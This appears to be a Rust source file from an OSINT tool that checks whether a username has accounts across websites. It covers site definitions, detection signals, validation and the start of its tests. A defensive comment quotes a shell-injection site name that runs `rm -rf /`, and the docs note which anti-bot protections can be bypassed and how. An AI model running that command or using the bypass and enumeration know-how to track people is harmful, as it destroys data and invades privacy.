adler_core/site.rs
1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
/// One site we can probe for the existence of an account.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
    /// Human-readable site name. Doubles as the stable filter key
    /// (case-insensitive) used by CLI `--only` / `--exclude`.
    pub name: String,
    /// URL template containing a `{username}` placeholder.
    pub url: UrlTemplate,
    /// Ordered list of detection signals. Aggregated per the module-level
    /// docs (negative-priority: any `NotFound` vote wins).
    /// Optional in source JSON when [`Site::engine`] is set — the engine's
    /// signals are inherited at load time. After
    /// [`crate::Registry`] resolution this vec is always non-empty (or the
    /// site fails `validate`).
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// One or more usernames known to exist on this site. Consumed by
    /// `adler doctor` to verify the signal list still reports `Found`
    /// for a real account. Accepts either a single string or an array
    /// of strings in JSON; the doctor probes each in declaration order
    /// and passes the present-check if **any** one of them resolves to
    /// `Found`. Listing several is defensive — brand accounts or other
    /// users that the site special-cases (e.g. Instagram's own
    /// `instagram` account) shouldn't false-fail the whole site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_present: Option<KnownPresent>,
    /// Username known to *not* exist on this site (optional). When omitted,
    /// the doctor generates a random nonsense username instead.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_absent: Option<String>,
    /// Optional CSS-selector rules for pulling profile fields (name, bio,
    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub extract: Vec<Extractor>,
    /// Free-form classification tags for scanning a subset of the registry,
    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
    /// A site with no tags is universal (included unless a `--tag` filter
    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
    /// convention, not enforced.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub tags: Vec<String>,
    /// Extra HTTP headers to send with the probe (e.g.
    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
    /// backends apply them via `Network.setExtraHTTPHeaders` before
    /// navigation; the raw-HTTP path doesn't read this yet.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Optional regular expression describing usernames a site will
    /// accept. When set and the scanned username doesn't match, the
    /// site is skipped (the outcome is reported as `Uncertain` with
    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
    /// Saves work AND avoids the false-positive class where a site
    /// 404s on illegal usernames in ways our signal can't tell apart
    /// from a missing account.
    ///
    /// Imported from Sherlock's `regexCheck` field; 95+ sites
    /// upstream carry one (length bounds, character classes, etc.).
    /// [`Site::validate`] compiles the pattern with `regex::Regex`
    /// purely as a diagnostic: a pattern that fails to compile (for
    /// example one using look-around, which that crate does not
    /// support) is logged at DEBUG level and the site is still
    /// accepted — it is *not* rejected. Per that log message the
    /// username gate is then disabled for the site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
    /// Name of a shared [`Engine`] this site inherits from (e.g.
    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
    /// thousands of instances with identical detection signatures;
    /// defining the signature once on an engine and inheriting it
    /// keeps the registry small and the cost of a platform-wide
    /// HTML change one fix instead of hundreds.
    ///
    /// At registry-load time the engine fields are merged *under* the
    /// site's own — anything the site declares explicitly (`signals`,
    /// `request_headers`, `regex_check`) wins on
    /// conflict; anything left empty / unset is filled from the
    /// engine. An `engine: "X"` referring to a non-existent X is a
    /// load-time error.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub engine: Option<String>,
    /// Characters the site silently drops from the username server-side
    /// before matching — `john.doe` and `johndoe` resolve to the same
    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
    /// at probe time so the URL we issue matches the canonical form
    /// the site uses, avoiding a false `NotFound` on a benign
    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub strip_bad_char: Option<String>,
    /// HTTP method used to probe this site. Defaults to GET — the vast
    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
    /// some Discord/Holopin endpoints) only answer to POST.
    #[serde(default, skip_serializing_if = "is_default_method")]
    pub request_method: HttpMethod,
    /// Request body to send when [`Site::request_method`] is POST. The
    /// literal `{username}` placeholder is substituted with the probe
    /// username (same as URL templates). For GraphQL endpoints this
    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub request_body: Option<String>,
    /// Specific anti-bot mechanisms the site is known to deploy. A
    /// richer alternative to the flat `bot-protected` tag — knowing
    /// *which* protection a site uses lets future routing pick the
    /// right backend (`Cloudflare` → cloudscraper-style bypass,
    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
    /// of the all-or-nothing `bot-protected` decision.
    ///
    /// Independent of [`Site::tags`]: the existing `bot-protected`
    /// tag stays as a back-compat shorthand and routes through the
    /// browser backend exactly as before. When this vector is
    /// non-empty Adler also treats the site as bot-protected
    /// regardless of the tag.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub protection: Vec<ProtectionKind>,
    /// Disable the site without removing it from the registry.
    /// Disabled sites are skipped by [`crate::Registry::filter`] —
    /// they don't get probed, don't appear in `--list-sites`, and
    /// don't count toward the doctor's tally. Useful for parking
    /// known-broken entries with a reason comment instead of
    /// deleting them outright, so a future contributor can re-enable
    /// the entry by flipping the flag once they've authored a
    /// working signature.
    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
    pub disabled: bool,
    /// Free-form annotation explaining why a [`Site::disabled`] entry
    /// was parked. The Rust runtime doesn't act on it — the JSON
    /// loader, scan path and doctor all just look at `disabled` — but
    /// downstream tooling (`scripts/doctor_aggregate.py`, ad-hoc
    /// audits) and human maintainers reading `sites.json` directly
    /// rely on it to tell categories apart at-a-glance:
    /// `duplicate of <canonical>`, `Honest Limits: …`, `doctor: 3+
    /// consecutive structural failures`, etc. Optional; only meaningful
    /// when `disabled` is also `true`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub disabled_reason: Option<String>,
    /// Canonical-source link for mirror-style sites. When a site is
    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
    /// `YouTube`), `source` carries the name of the primary site this
    /// one mirrors. Lets future UX surface "Twitter is offline,
    /// here's the same account on Nitter" without hand-curated
    /// linkage. Empty / `None` for canonical sites and sites with
    /// no known mirror relationship.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub source: Option<String>,
    /// Approximate popularity rank — lower numbers are more popular.
    /// Used by `adler --top N` to scan only the most-popular N sites
    /// (useful for fast checks of high-signal targets). Ranks are
    /// curated, not derived from traffic data: the seed set covers
    /// well-known OSINT-relevant sites where most users have
    /// accounts. Sites without a rank are skipped by `--top N`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub popularity: Option<u32>,
    /// Egress requirement for reaching this site — country and/or IP
    /// type the probe must exit from (see [`AccessPolicy`]). Default
    /// (empty) means no special routing: the request uses the client's
    /// default egress. When constrained and no configured egress fits,
    /// the probe is reported `Uncertain(GeoUnavailable)` rather than
    /// fetched from the wrong location.
    #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
    pub access: AccessPolicy,
}
190
/// A specific anti-bot mechanism a site is known to deploy. Used to
/// route probes to the right backend (raw HTTP, cloudscraper, full
/// browser) and to inform users what blocks reliable detection.
///
/// Serialised in kebab-case, so the JSON spellings are `"cloudflare"`,
/// `"cloudfront"`, `"ddos-guard"`, `"cf-js-challenge"`, `"cf-firewall"`,
/// `"tls-fingerprint"`, `"anubis"`, `"captcha"`, `"user-agent"` and
/// `"user-auth"`. The enum is `#[non_exhaustive]`, so matches outside
/// this crate need a wildcard arm.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "kebab-case")]
#[non_exhaustive]
pub enum ProtectionKind {
    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
    /// (e.g. `FlareSolverr`) without a full browser.
    Cloudflare,
    /// AWS `CloudFront` edge protection. Often UA-strictness only.
    Cloudfront,
    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
    /// challenge model to Cloudflare.
    DdosGuard,
    /// Cloudflare's JS-challenge ("I am under attack" mode).
    /// Needs a JS-executing backend.
    CfJsChallenge,
    /// Cloudflare's WAF firewall blocking by signature, requiring
    /// a real browser fingerprint to clear.
    CfFirewall,
    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
    /// client by its TLS handshake shape, not its UA).
    TlsFingerprint,
    /// `Anubis` proof-of-work challenge. Used by codeberg + a
    /// growing number of FOSS projects to discourage scraping.
    Anubis,
    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
    /// always blocking — `Uncertain` is the honest answer.
    Captcha,
    /// Trivial UA-strictness: rejects unknown User-Agent strings
    /// but lets through a real-browser UA. Cheapest to bypass.
    UserAgent,
    /// Endpoint requires authentication; no anonymous probe path
    /// exists. Practically unscrapable for OSINT.
    UserAuth,
}
229
/// HTTP method used to probe a site. Only GET and POST are supported.
///
/// Serialised in upper case (`"GET"` / `"POST"`). `Get` is the
/// `Default`, which is what a site receives when the field is absent
/// from its JSON.
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "UPPERCASE")]
pub enum HttpMethod {
    /// Standard GET — the default for ~99% of sites in the registry.
    #[default]
    Get,
    /// POST — for API endpoints that only differentiate accounts via a
    /// body payload (GraphQL queries, form submissions). Pair with
    /// [`Site::request_body`].
    Post,
}
242
243/// serde's `skip_serializing_if` callback contract requires a
244/// reference, so the by-value lint on a 1-byte type doesn't apply.
245#[allow(clippy::trivially_copy_pass_by_ref)]
246fn is_default_method(m: &HttpMethod) -> bool {
247 matches!(m, HttpMethod::Get)
248}
249
/// Shared detection signature template for a family of sites that
/// run the same forum / blog / wiki software (Discourse, vBulletin,
/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
///
/// Engines carry the same kinds of fields as a [`Site`] does (just
/// the inheritable ones — there's no per-engine `url`, that comes
/// from the site itself). At registry load, the engine's fields
/// are merged *under* each referring site's own fields: site wins
/// on conflict. The merge itself is [`Engine::merge_into`].
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
    /// Default detection signals for sites of this family.
    /// Inherited only when the site itself declares no `signals`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// Default extra HTTP headers (e.g. a User-Agent that the
    /// platform accepts where the browser default gets blocked).
    /// Merged with the site's own headers; site wins per-key.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Default username-validity regex inherited only when the site
    /// itself doesn't declare one. A pattern that does not compile
    /// under `regex::Regex` is only logged by [`Engine::validate`];
    /// it does not make the engine invalid.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
}
276
277impl Engine {
278 /// Compile-check the engine's own constraints — the inheritable
279 /// fields are subject to the same validation as a site's would
280 /// be.
281 ///
282 /// # Errors
283 /// Returns [`Error::InvalidSite`] when the engine name is
284 /// empty, a signal carries an empty marker, or any other
285 /// constraint a [`Site::validate`] would also flag.
286 pub fn validate(&self, name: &str) -> Result<()> {
287 if name.trim().is_empty() {
288 return Err(Error::InvalidSite {
289 reason: "engine name is empty".into(),
290 });
291 }
292 for signal in &self.signals {
293 signal.validate().map_err(|reason| Error::InvalidSite {
294 reason: format!("engine {name:?}: {reason}"),
295 })?;
296 }
297 if let Some(pat) = &self.regex_check {
298 if let Err(err) = regex::Regex::new(pat) {
299 // The Rust `regex` crate refuses look-around for DoS
300 // reasons; some upstream registries (Sherlock, WMN)
301 // ship patterns that need it. Downgraded from WARN to
302 // DEBUG: it's a known structural limit, the probe
303 // path falls back gracefully, and the noise dominated
304 // CLI startup.
305 tracing::debug!(
306 engine = %name, pattern = %pat, error = %err,
307 "engine regex_check did not compile; gate disabled for inheriting sites",
308 );
309 }
310 }
311 Ok(())
312 }
313
314 /// Fill the inheritable empty / unset fields of `site` from
315 /// this engine. Site fields are authoritative: if the site has
316 /// any signals at all, no engine signals are merged in.
317 /// `request_headers` merge per-key (site wins on per-key
318 /// conflict).
319 pub fn merge_into(&self, site: &mut Site) {
320 if site.signals.is_empty() {
321 site.signals.clone_from(&self.signals);
322 }
323 for (k, v) in &self.request_headers {
324 site.request_headers
325 .entry(k.clone())
326 .or_insert_with(|| v.clone());
327 }
328 if site.regex_check.is_none() {
329 site.regex_check.clone_from(&self.regex_check);
330 }
331 }
332}
333
/// Known-present declaration on a [`Site`].
///
/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
/// the site was authored with, so single-username entries stay
/// compact.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
    /// Exactly one candidate username.
    Single(String),
    /// A list of candidate usernames (any JSON array lands here, so the
    /// type itself does not guarantee two or more entries — an empty
    /// list is rejected by [`Site::validate`]). Doctor passes if any
    /// resolve to `Found`.
    Multiple(Vec<String>),
}
351
352impl KnownPresent {
353 /// View all candidate usernames as a slice, in declaration order.
354 /// Always non-empty for `Single`; may be empty for a hand-authored
355 /// `Multiple([])` (validation rejects that).
356 pub fn as_slice(&self) -> &[String] {
357 match self {
358 Self::Single(s) => std::slice::from_ref(s),
359 Self::Multiple(v) => v.as_slice(),
360 }
361 }
362
363 /// Primary candidate — the first declared username. `Single`
364 /// always has one; `Multiple` may be empty if a contributor wrote
365 /// `[]` (caught by [`Site::validate`]).
366 pub fn primary(&self) -> Option<&str> {
367 self.as_slice().first().map(String::as_str)
368 }
369}
370
371impl From<&str> for KnownPresent {
372 fn from(s: &str) -> Self {
373 Self::Single(s.to_owned())
374 }
375}
376
377impl From<String> for KnownPresent {
378 fn from(s: String) -> Self {
379 Self::Single(s)
380 }
381}
382
/// Upper bound on a site name's length. Names appear in CLI output,
/// CSV columns, and the validate-sites.yml workflow's run-summary
/// table — keeping them short avoids both UI breakage and
/// pathological CI artefacts.
///
/// Enforced by [`Site::validate`]; a name longer than this limit is
/// rejected with [`Error::InvalidSite`].
const NAME_MAX_LEN: usize = 80;
388
/// Decide whether `name` is safe to interpolate into shell, CSV, and
/// CLI argument contexts.
///
/// Mirrors the JSON Schema pattern `^[\w][\w .()!/+-]*$` with `\w`
/// taken as ASCII: the first character must be an ASCII letter, digit
/// or `_`; every later character may additionally be a space or one of
/// `.()!/+-`. The empty string is not safe.
fn is_safe_site_name(name: &str) -> bool {
    let is_word = |c: char| c == '_' || c.is_ascii_alphanumeric();
    let is_extra = |c: char| matches!(c, ' ' | '.' | '(' | ')' | '!' | '/' | '+' | '-');

    let mut rest = name.chars();
    // The leading character is held to the stricter word-only class.
    let starts_ok = matches!(rest.next(), Some(first) if is_word(first));
    starts_ok && rest.all(|c| is_word(c) || is_extra(c))
}
405
/// A rule for extracting one profile field from a page.
///
/// [`Site::validate`] rejects an extractor whose `field` is blank or
/// whose `selector` does not parse with `scraper::Selector::parse`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
    pub field: String,
    /// CSS selector locating the element.
    pub selector: String,
    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
    /// element's trimmed text content is used.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub attr: Option<String>,
}
418
419impl Site {
420 /// Render the site URL for a given username.
421 ///
422 /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
423 /// those characters are removed from `username` before
424 /// substitution — so a `john.doe` probe against a site that
425 /// lists `strip_bad_char: "."` actually hits the URL for
426 /// `johndoe`, matching the canonical form the site stores
427 /// internally.
428 pub fn url_for(&self, username: &Username) -> String {
429 let raw = username.as_str();
430 match self.strip_bad_char.as_deref() {
431 Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
432 let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
433 self.url.substitute(&stripped)
434 }
435 _ => self.url.substitute(raw),
436 }
437 }
438
439 /// Validate semantic invariants the type system can't enforce
440 /// (empty signals list, empty markers, empty status code sets).
441 pub fn validate(&self) -> Result<()> {
442 if self.name.trim().is_empty() {
443 return Err(Error::InvalidSite {
444 reason: "site name is empty".into(),
445 });
446 }
447 // Site names doubled as shell-interpolation values in the
448 // `validate-sites.yml` PR gate; an unsanitised name like
449 // `Foo"; rm -rf /; #` would have broken out of `"$name"`
450 // quoting and run arbitrary commands on the runner. Both the
451 // JSON Schema and this Rust loader enforce a safe character
452 // class (word chars plus a few visual punctuation marks) at
453 // every entry point.
454 if self.name.len() > NAME_MAX_LEN {
455 return Err(Error::InvalidSite {
456 reason: format!(
457 "site name longer than {NAME_MAX_LEN} chars: {:?}",
458 self.name
459 ),
460 });
461 }
462 if !is_safe_site_name(&self.name) {
463 return Err(Error::InvalidSite {
464 reason: format!(
465 "site name {:?} contains characters outside the allowed \
466 set (word chars, space, `.()!/+-`)",
467 self.name
468 ),
469 });
470 }
471 if self.signals.is_empty() {
472 return Err(Error::InvalidSite {
473 reason: format!("site {:?}: signals list is empty", self.name),
474 });
475 }
476 for signal in &self.signals {
477 signal.validate().map_err(|reason| Error::InvalidSite {
478 reason: format!("site {:?}: {reason}", self.name),
479 })?;
480 }
481 for extractor in &self.extract {
482 if extractor.field.trim().is_empty() {
483 return Err(Error::InvalidSite {
484 reason: format!("site {:?}: extractor has an empty field name", self.name),
485 });
486 }
487 if scraper::Selector::parse(&extractor.selector).is_err() {
488 return Err(Error::InvalidSite {
489 reason: format!(
490 "site {:?}: invalid CSS selector {:?} for field {:?}",
491 self.name, extractor.selector, extractor.field
492 ),
493 });
494 }
495 }
496 if let Some(pat) = &self.regex_check {
497 if let Err(err) = regex::Regex::new(pat) {
498 // Sherlock's regexes occasionally use lookarounds
499 // (e.g. `(?![.-])`), which the Rust `regex` crate
500 // doesn't support — it's a true regular-language
501 // engine for performance + DoS safety. Rather than
502 // reject the whole site over a username-gate the
503 // probe path will simply skip and let the site keep
504 // working at the cost of one wasted probe per
505 // illegal username. Logged at DEBUG (not WARN) — it's
506 // a known structural limit, ~8 sites in the embedded
507 // registry need look-around. The noise dominated CLI
508 // startup; set `ADLER_LOG=debug` to see them again.
509 tracing::debug!(
510 site = %self.name, pattern = %pat, error = %err,
511 "regex_check did not compile; username-gate disabled for this site",
512 );
513 }
514 }
515 if let Some(kp) = &self.known_present {
516 if kp.as_slice().is_empty() {
517 return Err(Error::InvalidSite {
518 reason: format!("site {:?}: known_present is an empty list", self.name),
519 });
520 }
521 for name in kp.as_slice() {
522 if name.trim().is_empty() {
523 return Err(Error::InvalidSite {
524 reason: format!(
525 "site {:?}: known_present contains an empty username",
526 self.name
527 ),
528 });
529 }
530 }
531 }
532 for tag in &self.tags {
533 if tag.trim().is_empty() {
534 return Err(Error::InvalidSite {
535 reason: format!("site {:?}: tag is empty", self.name),
536 });
537 }
538 }
539 Ok(())
540 }
541}
542
/// URL template containing a `{username}` placeholder.
///
/// Validated at construction: must contain the placeholder and start with
/// `http://` or `https://`. The wrapped string is private;
/// [`UrlTemplate::new`] is the validating constructor and the
/// `Deserialize` impl goes through it, so deserialised templates are
/// held to the same rules.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
549
/// Literal token that [`UrlTemplate::new`] requires in every template
/// and that `UrlTemplate::substitute` replaces with the username.
const PLACEHOLDER: &str = "{username}";
551
552impl UrlTemplate {
553 /// Build a template, validating placeholder and scheme.
554 pub fn new(template: impl Into<String>) -> Result<Self> {
555 let t = template.into();
556 if !t.contains(PLACEHOLDER) {
557 return Err(Error::InvalidSite {
558 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
559 });
560 }
561 if !(t.starts_with("http://") || t.starts_with("https://")) {
562 return Err(Error::InvalidSite {
563 reason: format!("url template must start with http(s)://: {t:?}"),
564 });
565 }
566 Ok(Self(t))
567 }
568
569 fn substitute(&self, username: &str) -> String {
570 self.0.replace(PLACEHOLDER, username)
571 }
572
573 /// Borrow the raw template (with placeholder).
574 pub fn as_str(&self) -> &str {
575 &self.0
576 }
577}
578
579impl fmt::Display for UrlTemplate {
580 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
581 f.write_str(&self.0)
582 }
583}
584
585impl Serialize for UrlTemplate {
586 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
587 self.0.serialize(s)
588 }
589}
590
591impl<'de> Deserialize<'de> for UrlTemplate {
592 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
593 let raw = String::deserialize(d)?;
594 Self::new(raw).map_err(serde::de::Error::custom)
595 }
596}
597
/// A single piece of evidence about whether an account exists.
///
/// Signals are tagged in JSON by their `kind`, spelled in snake_case —
/// e.g. `{"kind": "status_found", "codes": [200]}` or
/// `{"kind": "body_absent", "text": "Profile not found"}`. New variants
/// will land for Phase 2 length-baseline scoring; the enum is
/// `#[non_exhaustive]` so adding variants is not a breaking change.
///
/// Naming note: the `*Absent` variants describe the *account* being
/// absent. They fire when their text / fragment **is present** in the
/// response.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
    /// Votes **`Found`** when the response status is in `codes`.
    StatusFound {
        /// Status codes that vote for existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`NotFound`** when the response status is in `codes`.
    StatusNotFound {
        /// Status codes that vote for non-existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`Found`** when the response body contains `text`.
    BodyPresent {
        /// Substring whose appearance votes for existence. Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the response body contains `text`.
    BodyAbsent {
        /// Substring whose appearance votes for non-existence (e.g.
        /// `"Profile not found"`). Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the final URL (post-redirect) contains
    /// `fragment`.
    RedirectAbsent {
        /// Substring that, when present in the final URL, indicates the
        /// account is missing (typically `"/login"` or `"/404"`). Must be
        /// non-empty.
        fragment: String,
    },
}
637
/// Probe data extracted from an HTTP response, fed to each [`Signal`].
///
/// Internal detection plumbing — not part of the public API. Both
/// string fields are borrowed for `'a`; the probe owns no response
/// data itself.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// HTTP status code. Read by the `StatusFound` / `StatusNotFound` signals.
    pub(crate) status: u16,
    /// Final URL after redirects. Read by the `RedirectAbsent` signal.
    pub(crate) final_url: &'a str,
    /// Decoded response body. Empty string when no body-using signal is configured.
    /// Read by the `BodyPresent` / `BodyAbsent` signals.
    pub(crate) body: &'a str,
}
650
/// What one signal concluded after looking at a probe.
///
/// Produced by [`Signal::evaluate`] and combined across all of a
/// site's signals by [`aggregate`].
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// This signal votes that the account exists.
    Found,
    /// This signal votes that the account does not exist.
    NotFound,
    /// This signal had nothing to say (its trigger condition didn't match).
    /// Ignored by [`aggregate`].
    Ambiguous,
}
661
662impl Signal {
663 /// True if this signal needs to inspect the response body. Used by the
664 /// client to skip body reads when no signal requires them.
665 pub(crate) fn needs_body(&self) -> bool {
666 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
667 }
668
669 /// Evaluate this signal against a probe and produce a vote.
670 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
671 match self {
672 Self::StatusFound { codes } => {
673 if codes.contains(&probe.status) {
674 SignalVerdict::Found
675 } else {
676 SignalVerdict::Ambiguous
677 }
678 }
679 Self::StatusNotFound { codes } => {
680 if codes.contains(&probe.status) {
681 SignalVerdict::NotFound
682 } else {
683 SignalVerdict::Ambiguous
684 }
685 }
686 Self::BodyPresent { text } => {
687 if probe.body.contains(text.as_str()) {
688 SignalVerdict::Found
689 } else {
690 SignalVerdict::Ambiguous
691 }
692 }
693 Self::BodyAbsent { text } => {
694 if probe.body.contains(text.as_str()) {
695 SignalVerdict::NotFound
696 } else {
697 SignalVerdict::Ambiguous
698 }
699 }
700 Self::RedirectAbsent { fragment } => {
701 if probe.final_url.contains(fragment.as_str()) {
702 SignalVerdict::NotFound
703 } else {
704 SignalVerdict::Ambiguous
705 }
706 }
707 }
708 }
709
710 /// Human-readable description of why this signal fired against `probe`,
711 /// for verdict explainability. Only meaningful for a signal that voted
712 /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
713 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
714 match self {
715 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
716 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
717 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
718 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
719 Self::RedirectAbsent { fragment } => {
720 format!("final URL contains {fragment:?} (redirect_absent)")
721 }
722 }
723 }
724
725 fn validate(&self) -> std::result::Result<(), String> {
726 match self {
727 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
728 if codes.is_empty() {
729 return Err("status signal codes list is empty".into());
730 }
731 }
732 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
733 if text.is_empty() {
734 return Err("body signal text is empty".into());
735 }
736 }
737 Self::RedirectAbsent { fragment } => {
738 if fragment.is_empty() {
739 return Err("redirect signal fragment is empty".into());
740 }
741 }
742 }
743 Ok(())
744 }
745}
746
747/// Aggregate per-signal verdicts into a final [`MatchKind`].
748///
749/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
750/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
751/// docs for why a `NotFound` vote outranks a `Found` vote.
752pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
753where
754 I: IntoIterator<Item = SignalVerdict>,
755{
756 let mut found = false;
757 let mut not_found = false;
758 for v in verdicts {
759 match v {
760 SignalVerdict::Found => found = true,
761 SignalVerdict::NotFound => not_found = true,
762 SignalVerdict::Ambiguous => {}
763 }
764 }
765 if not_found {
766 MatchKind::NotFound
767 } else if found {
768 MatchKind::Found
769 } else {
770 MatchKind::Uncertain
771 }
772}
773
#[cfg(test)]
mod tests {
    use super::*;

    /// Build a minimal [`Site`] named "Example" that carries the given
    /// detection signals; every other field is left empty / unset.
    fn site_with(signals: Vec<Signal>) -> Site {
        let url = UrlTemplate::new("https://example.com/{username}").unwrap();
        Site {
            name: String::from("Example"),
            url,
            signals,
            known_present: None,
            known_absent: None,
            extract: vec![],
            tags: vec![],
            request_headers: std::collections::BTreeMap::new(),
            regex_check: None,
            engine: None,
            strip_bad_char: None,
            request_method: crate::site::HttpMethod::Get,
            request_body: None,
            protection: vec![],
            disabled: false,
            disabled_reason: None,
            source: None,
            popularity: None,
            access: crate::AccessPolicy::default(),
        }
    }

    /// The fixture most tests start from: a site whose only signal is
    /// `StatusFound` on HTTP 200.
    fn status_200_site() -> Site {
        site_with(vec![Signal::StatusFound { codes: vec![200] }])
    }

    // ---- URL templating -------------------------------------------------

    #[test]
    fn url_template_substitutes_placeholder() {
        let site = status_200_site();
        let alice = Username::new("alice").unwrap();
        assert_eq!(site.url_for(&alice), "https://example.com/alice");
    }

    #[test]
    fn url_for_strips_bad_chars_before_substitution() {
        let mut site = status_200_site();
        site.strip_bad_char = Some(".".into());
        let dotted = Username::new("john.doe").unwrap();
        assert_eq!(site.url_for(&dotted), "https://example.com/johndoe");
    }

    #[test]
    fn url_for_strip_bad_char_noop_when_no_match() {
        let mut site = status_200_site();
        site.strip_bad_char = Some(".".into());
        let plain = Username::new("alice").unwrap();
        assert_eq!(site.url_for(&plain), "https://example.com/alice");
    }

    #[test]
    fn url_template_rejects_missing_placeholder() {
        let outcome = UrlTemplate::new("https://example.com/users/");
        assert!(outcome.is_err());
    }

    #[test]
    fn url_template_rejects_bad_scheme() {
        let outcome = UrlTemplate::new("ftp://example.com/{username}");
        assert!(outcome.is_err());
    }

    // ---- Site / signal validation ---------------------------------------

    #[test]
    fn validate_requires_non_empty_signals() {
